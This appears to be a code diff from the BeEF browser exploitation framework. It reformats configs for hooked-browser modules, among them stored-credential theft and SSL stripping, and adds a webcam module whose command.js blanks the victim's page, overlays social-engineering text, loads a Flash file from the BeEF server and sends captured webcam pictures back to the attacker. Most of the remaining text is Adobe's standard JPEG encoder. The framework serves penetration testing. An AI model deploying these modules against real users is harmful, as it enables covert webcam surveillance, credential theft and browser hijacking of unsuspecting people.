@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_stored_credentials/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Stored Credentials"
description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]

2
modules/browser/hooked_domain/link_rewrite/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]

2
modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]

4
modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
View File

@@ -17,10 +17,10 @@ beef:
module:
mobilesafari_address_spoofing:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "iOS Address Bar Spoofing"
description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
authors: ["bcoles","xntrik","majorsecurity.net"]
authors: ["bcoles", "xntrik", "majorsecurity.net"]
target:
working:
S:

2
modules/browser/hooked_domain/prompt_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]

2
modules/browser/hooked_domain/replace_video/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]

2
modules/browser/hooked_domain/rickroll/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]

2
modules/browser/hooked_domain/site_redirect/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]

2
modules/browser/hooked_domain/site_redirect_iframe/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]

70
modules/browser/webcam/command.js Normal file
View File

@@ -0,0 +1,70 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
/*
If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons:
- Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox
- There is a bug in flash: http://forums.adobe.com/thread/880967
- You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the
body_social_engineer_and_overlay below and try again.
*/
//The social engineering message and the overlay div's
var body_social_engineer_and_overlay = '<div class="thingy" style="position:absolute;top:0px;left:0px;width:800px;height:109px"></div> <div class="thingy" style="position:absolute;top:105px;left:0px;width:100px;height:315px"></div> <div class="thingy" style="position:absolute;top:105px;left:315px;width:570px;height:315px"></div> <div class="thingy" style="position:absolute;top:248px;left:0px;width:400px;height:280px"></div><div class="text" style="position:absolute;top:20px;left:50px;z-index:100"> <h2 style="margin:0"><%= @social_engineering_title %></h2> <p style="width: 500px; font-size: 14px; margin:0"><%= @social_engineering_text %></p></div>';
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }';
//This function is called by swfobject, if if fails to add the flash file to the page
js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
//Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed)
//We'll notice when flash is not installed anyway...
//var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"><div><h1>You need FlashPlayer 9 or higher!</h1><p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p></div></div>';
var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"></div>';
//The style is the only thing we already append to the head
var theHead = document.getElementsByTagName("head")[0];
var style = document.createElement('style');
style.type = 'text/css';
style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }';
theHead.appendChild(style);
//A nice library that helps us to include the swf file
var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Empty body first
$j('body').html('');
//Now show our flash stuff, muahahaha
$j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script);
});

25
modules/browser/webcam/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
webcam:
enable: true
category: "Browser"
name: "Webcam"
description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.<br />The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
authors: ["floyd @floyd_ch"]
target:
working: ["All"]

39
modules/browser/webcam/dev/com/adobe/images/BitString.as Executable file
View File

@@ -0,0 +1,39 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
public class BitString
{
public var len:int = 0;
public var val:int = 0;
}
}

648
modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as Executable file
View File

@@ -0,0 +1,648 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
import flash.geom.*;
import flash.display.*;
import flash.utils.*;
/**
* Class that converts BitmapData into a valid JPEG
*/
public class JPGEncoder
{
// Static table initialization
private var ZigZag:Array = [
0, 1, 5, 6,14,15,27,28,
2, 4, 7,13,16,26,29,42,
3, 8,12,17,25,30,41,43,
9,11,18,24,31,40,44,53,
10,19,23,32,39,45,52,54,
20,22,33,38,46,51,55,60,
21,34,37,47,50,56,59,61,
35,36,48,49,57,58,62,63
];
private var YTable:Array = new Array(64);
private var UVTable:Array = new Array(64);
private var fdtbl_Y:Array = new Array(64);
private var fdtbl_UV:Array = new Array(64);
private function initQuantTables(sf:int):void
{
var i:int;
var t:Number;
var YQT:Array = [
16, 11, 10, 16, 24, 40, 51, 61,
12, 12, 14, 19, 26, 58, 60, 55,
14, 13, 16, 24, 40, 57, 69, 56,
14, 17, 22, 29, 51, 87, 80, 62,
18, 22, 37, 56, 68,109,103, 77,
24, 35, 55, 64, 81,104,113, 92,
49, 64, 78, 87,103,121,120,101,
72, 92, 95, 98,112,100,103, 99
];
for (i = 0; i < 64; i++) {
t = Math.floor((YQT[i]*sf+50)/100);
if (t < 1) {
t = 1;
} else if (t > 255) {
t = 255;
}
YTable[ZigZag[i]] = t;
}
var UVQT:Array = [
17, 18, 24, 47, 99, 99, 99, 99,
18, 21, 26, 66, 99, 99, 99, 99,
24, 26, 56, 99, 99, 99, 99, 99,
47, 66, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99
];
for (i = 0; i < 64; i++) {
t = Math.floor((UVQT[i]*sf+50)/100);
if (t < 1) {
t = 1;
} else if (t > 255) {
t = 255;
}
UVTable[ZigZag[i]] = t;
}
var aasf:Array = [
1.0, 1.387039845, 1.306562965, 1.175875602,
1.0, 0.785694958, 0.541196100, 0.275899379
];
i = 0;
for (var row:int = 0; row < 8; row++)
{
for (var col:int = 0; col < 8; col++)
{
fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
i++;
}
}
}
private var YDC_HT:Array;
private var UVDC_HT:Array;
private var YAC_HT:Array;
private var UVAC_HT:Array;
private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array
{
var codevalue:int = 0;
var pos_in_table:int = 0;
var HT:Array = new Array();
for (var k:int=1; k<=16; k++) {
for (var j:int=1; j<=nrcodes[k]; j++) {
HT[std_table[pos_in_table]] = new BitString();
HT[std_table[pos_in_table]].val = codevalue;
HT[std_table[pos_in_table]].len = k;
pos_in_table++;
codevalue++;
}
codevalue*=2;
}
return HT;
}
private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0];
private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d];
private var std_ac_luminance_values:Array = [
0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12,
0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07,
0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08,
0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0,
0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16,
0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28,
0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39,
0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49,
0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,
0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,
0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,
0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89,
0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,
0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,
0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,
0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5,
0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,
0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2,
0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,
0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
0xf9,0xfa
];
private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0];
private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
private var std_ac_chrominance_nrcodes:Array = [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77];
private var std_ac_chrominance_values:Array = [
0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21,
0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71,
0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91,
0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0,
0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34,
0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26,
0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38,
0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48,
0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58,
0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,
0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,
0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87,
0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96,
0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,
0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,
0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3,
0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2,
0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,
0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,
0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
0xf9,0xfa
];
private function initHuffmanTbl():void
{
YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values);
UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values);
YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values);
UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values);
}
private var bitcode:Array = new Array(65535);
private var category:Array = new Array(65535);
private function initCategoryNumber():void
{
var nrlower:int = 1;
var nrupper:int = 2;
var nr:int;
for (var cat:int=1; cat<=15; cat++) {
//Positive numbers
for (nr=nrlower; nr<nrupper; nr++) {
category[32767+nr] = cat;
bitcode[32767+nr] = new BitString();
bitcode[32767+nr].len = cat;
bitcode[32767+nr].val = nr;
}
//Negative numbers
for (nr=-(nrupper-1); nr<=-nrlower; nr++) {
category[32767+nr] = cat;
bitcode[32767+nr] = new BitString();
bitcode[32767+nr].len = cat;
bitcode[32767+nr].val = nrupper-1+nr;
}
nrlower <<= 1;
nrupper <<= 1;
}
}
// IO functions
private var byteout:ByteArray;
private var bytenew:int = 0;
private var bytepos:int = 7;
private function writeBits(bs:BitString):void
{
var value:int = bs.val;
var posval:int = bs.len-1;
while ( posval >= 0 ) {
if (value & uint(1 << posval) ) {
bytenew |= uint(1 << bytepos);
}
posval--;
bytepos--;
if (bytepos < 0) {
if (bytenew == 0xFF) {
writeByte(0xFF);
writeByte(0);
}
else {
writeByte(bytenew);
}
bytepos=7;
bytenew=0;
}
}
}
private function writeByte(value:int):void
{
byteout.writeByte(value);
}
private function writeWord(value:int):void
{
writeByte((value>>8)&0xFF);
writeByte((value )&0xFF);
}
// DCT & quantization core
private function fDCTQuant(data:Array, fdtbl:Array):Array
{
var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number;
var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number;
var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number;
var i:int;
/* Pass 1: process rows. */
var dataOff:int=0;
for (i=0; i<8; i++) {
tmp0 = data[dataOff+0] + data[dataOff+7];
tmp7 = data[dataOff+0] - data[dataOff+7];
tmp1 = data[dataOff+1] + data[dataOff+6];
tmp6 = data[dataOff+1] - data[dataOff+6];
tmp2 = data[dataOff+2] + data[dataOff+5];
tmp5 = data[dataOff+2] - data[dataOff+5];
tmp3 = data[dataOff+3] + data[dataOff+4];
tmp4 = data[dataOff+3] - data[dataOff+4];
/* Even part */
tmp10 = tmp0 + tmp3; /* phase 2 */
tmp13 = tmp0 - tmp3;
tmp11 = tmp1 + tmp2;
tmp12 = tmp1 - tmp2;
data[dataOff+0] = tmp10 + tmp11; /* phase 3 */
data[dataOff+4] = tmp10 - tmp11;
z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
data[dataOff+2] = tmp13 + z1; /* phase 5 */
data[dataOff+6] = tmp13 - z1;
/* Odd part */
tmp10 = tmp4 + tmp5; /* phase 2 */
tmp11 = tmp5 + tmp6;
tmp12 = tmp6 + tmp7;
/* The rotator is modified from fig 4-8 to avoid extra negations. */
z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
z3 = tmp11 * 0.707106781; /* c4 */
z11 = tmp7 + z3; /* phase 5 */
z13 = tmp7 - z3;
data[dataOff+5] = z13 + z2; /* phase 6 */
data[dataOff+3] = z13 - z2;
data[dataOff+1] = z11 + z4;
data[dataOff+7] = z11 - z4;
dataOff += 8; /* advance pointer to next row */
}
/* Pass 2: process columns. */
dataOff = 0;
for (i=0; i<8; i++) {
tmp0 = data[dataOff+ 0] + data[dataOff+56];
tmp7 = data[dataOff+ 0] - data[dataOff+56];
tmp1 = data[dataOff+ 8] + data[dataOff+48];
tmp6 = data[dataOff+ 8] - data[dataOff+48];
tmp2 = data[dataOff+16] + data[dataOff+40];
tmp5 = data[dataOff+16] - data[dataOff+40];
tmp3 = data[dataOff+24] + data[dataOff+32];
tmp4 = data[dataOff+24] - data[dataOff+32];
/* Even part */
tmp10 = tmp0 + tmp3; /* phase 2 */
tmp13 = tmp0 - tmp3;
tmp11 = tmp1 + tmp2;
tmp12 = tmp1 - tmp2;
data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */
data[dataOff+32] = tmp10 - tmp11;
z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
data[dataOff+16] = tmp13 + z1; /* phase 5 */
data[dataOff+48] = tmp13 - z1;
/* Odd part */
tmp10 = tmp4 + tmp5; /* phase 2 */
tmp11 = tmp5 + tmp6;
tmp12 = tmp6 + tmp7;
/* The rotator is modified from fig 4-8 to avoid extra negations. */
z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
z3 = tmp11 * 0.707106781; /* c4 */
z11 = tmp7 + z3; /* phase 5 */
z13 = tmp7 - z3;
data[dataOff+40] = z13 + z2; /* phase 6 */
data[dataOff+24] = z13 - z2;
data[dataOff+ 8] = z11 + z4;
data[dataOff+56] = z11 - z4;
dataOff++; /* advance pointer to next column */
}
// Quantize/descale the coefficients
for (i=0; i<64; i++) {
// Apply the quantization and scaling factor & Round to nearest integer
data[i] = Math.round((data[i]*fdtbl[i]));
}
return data;
}
// Chunk writing
private function writeAPP0():void
{
writeWord(0xFFE0); // marker
writeWord(16); // length
writeByte(0x4A); // J
writeByte(0x46); // F
writeByte(0x49); // I
writeByte(0x46); // F
writeByte(0); // = "JFIF",'\0'
writeByte(1); // versionhi
writeByte(1); // versionlo
writeByte(0); // xyunits
writeWord(1); // xdensity
writeWord(1); // ydensity
writeByte(0); // thumbnwidth
writeByte(0); // thumbnheight
}
private function writeSOF0(width:int, height:int):void
{
writeWord(0xFFC0); // marker
writeWord(17); // length, truecolor YUV JPG
writeByte(8); // precision
writeWord(height);
writeWord(width);
writeByte(3); // nrofcomponents
writeByte(1); // IdY
writeByte(0x11); // HVY
writeByte(0); // QTY
writeByte(2); // IdU
writeByte(0x11); // HVU
writeByte(1); // QTU
writeByte(3); // IdV
writeByte(0x11); // HVV
writeByte(1); // QTV
}
private function writeDQT():void
{
writeWord(0xFFDB); // marker
writeWord(132); // length
writeByte(0);
var i:int;
for (i=0; i<64; i++) {
writeByte(YTable[i]);
}
writeByte(1);
for (i=0; i<64; i++) {
writeByte(UVTable[i]);
}
}
private function writeDHT():void
{
writeWord(0xFFC4); // marker
writeWord(0x01A2); // length
var i:int;
writeByte(0); // HTYDCinfo
for (i=0; i<16; i++) {
writeByte(std_dc_luminance_nrcodes[i+1]);
}
for (i=0; i<=11; i++) {
writeByte(std_dc_luminance_values[i]);
}
writeByte(0x10); // HTYACinfo
for (i=0; i<16; i++) {
writeByte(std_ac_luminance_nrcodes[i+1]);
}
for (i=0; i<=161; i++) {
writeByte(std_ac_luminance_values[i]);
}
writeByte(1); // HTUDCinfo
for (i=0; i<16; i++) {
writeByte(std_dc_chrominance_nrcodes[i+1]);
}
for (i=0; i<=11; i++) {
writeByte(std_dc_chrominance_values[i]);
}
writeByte(0x11); // HTUACinfo
for (i=0; i<16; i++) {
writeByte(std_ac_chrominance_nrcodes[i+1]);
}
for (i=0; i<=161; i++) {
writeByte(std_ac_chrominance_values[i]);
}
}
private function writeSOS():void
{
writeWord(0xFFDA); // marker
writeWord(12); // length
writeByte(3); // nrofcomponents
writeByte(1); // IdY
writeByte(0); // HTY
writeByte(2); // IdU
writeByte(0x11); // HTU
writeByte(3); // IdV
writeByte(0x11); // HTV
writeByte(0); // Ss
writeByte(0x3f); // Se
writeByte(0); // Bf
}
// Core processing
private var DU:Array = new Array(64);
private function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number
{
var EOB:BitString = HTAC[0x00];
var M16zeroes:BitString = HTAC[0xF0];
var i:int;
var DU_DCT:Array = fDCTQuant(CDU, fdtbl);
//ZigZag reorder
for (i=0;i<64;i++) {
DU[ZigZag[i]]=DU_DCT[i];
}
var Diff:int = DU[0] - DC; DC = DU[0];
//Encode DC
if (Diff==0) {
writeBits(HTDC[0]); // Diff might be 0
} else {
writeBits(HTDC[category[32767+Diff]]);
writeBits(bitcode[32767+Diff]);
}
//Encode ACs
var end0pos:int = 63;
for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) {
};
//end0pos = first element in reverse order !=0
if ( end0pos == 0) {
writeBits(EOB);
return DC;
}
i = 1;
while ( i <= end0pos ) {
var startpos:int = i;
for (; (DU[i]==0) && (i<=end0pos); i++) {
}
var nrzeroes:int = i-startpos;
if ( nrzeroes >= 16 ) {
for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) {
writeBits(M16zeroes);
}
nrzeroes = int(nrzeroes&0xF);
}
writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]);
writeBits(bitcode[32767+DU[i]]);
i++;
}
if ( end0pos != 63 ) {
writeBits(EOB);
}
return DC;
}
private var YDU:Array = new Array(64);
private var UDU:Array = new Array(64);
private var VDU:Array = new Array(64);
private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void
{
var pos:int=0;
for (var y:int=0; y<8; y++) {
for (var x:int=0; x<8; x++) {
var P:uint = img.getPixel32(xpos+x,ypos+y);
var R:Number = Number((P>>16)&0xFF);
var G:Number = Number((P>> 8)&0xFF);
var B:Number = Number((P )&0xFF);
YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128;
UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B));
VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B));
pos++;
}
}
}
/**
* Constructor for JPEGEncoder class
*
* @param quality The quality level between 1 and 100 that detrmines the
* level of compression used in the generated JPEG
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public function JPGEncoder(quality:Number = 50)
{
if (quality <= 0) {
quality = 1;
}
if (quality > 100) {
quality = 100;
}
var sf:int = 0;
if (quality < 50) {
sf = int(5000 / quality);
} else {
sf = int(200 - quality*2);
}
// Create tables
initHuffmanTbl();
initCategoryNumber();
initQuantTables(sf);
}
/**
* Created a JPEG image from the specified BitmapData
*
* @param image The BitmapData that will be converted into the JPEG format.
* @return a ByteArray representing the JPEG encoded image data.
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public function encode(image:BitmapData):ByteArray
{
// Initialize bit writer
byteout = new ByteArray();
bytenew=0;
bytepos=7;
// Add JPEG headers
writeWord(0xFFD8); // SOI
writeAPP0();
writeDQT();
writeSOF0(image.width,image.height);
writeDHT();
writeSOS();
// Encode 8x8 macroblocks
var DCY:Number=0;
var DCU:Number=0;
var DCV:Number=0;
bytenew=0;
bytepos=7;
for (var ypos:int=0; ypos<image.height; ypos+=8) {
for (var xpos:int=0; xpos<image.width; xpos+=8) {
RGB2YUV(image, xpos, ypos);
DCY = processDU(YDU, fdtbl_Y, DCY, YDC_HT, YAC_HT);
